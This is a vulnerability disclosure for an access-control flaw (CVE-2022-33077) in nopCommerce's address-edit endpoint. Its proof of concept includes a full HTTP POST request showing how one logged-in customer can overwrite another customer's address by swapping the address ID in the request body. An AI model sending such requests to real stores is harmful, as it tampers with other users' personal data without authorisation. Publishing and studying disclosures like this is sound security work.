Description
There is an access control vulnerability affecting nopCommerce (≤ 4.50.2) and also affecting the upcoming beta version (4.60). The vulnerability lies in the “addressedit” endpoint, and a malicious customer can modify addresses of other users on the site. This has been assigned CVE-2022–33077.
Proof of concept
- Register 2 customers (C1 and C2) and add addresses (A1 and A2) for both of them respectively. Note down the address Id of both the created addresses (let it be A1_ID and A2_ID). We will now login as C1 and modify A2.
Login as C1 and capture the POST request to edit your address as shown below. I’ve highlighted 4 parameters that you need to replace.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
POST /customer/addressedit/<A1_ID> HTTP/2 Host: localhost Cookie: <C1_Session_Cookies_Here> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 506 Origin: http://localhost Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Address.Id=<A2_ID>&Address.FirstName=testing&Address.LastName=123&Address.Email=hello@hello.lcom&Address.Company=&Address.CountryId=211&Address.StateProvinceId=0&Address.City=sdv&Address.Address1=dsv&Address.Address2=&Address.ZipPostalCode=sdv&Address.PhoneNumber=12&Address.FaxNumber=&__RequestVerificationToken=<C1_CSRF_TOKEN_HERE>
- Upon firing the above request with C1’s session tokens, the address of C2 will be updated. First the server is checking whether the addressID in the URL belongs to the Session token provided in the cookies, and then it is simply updating the address ID inside the POST request body. Logically, it should only update what it validates.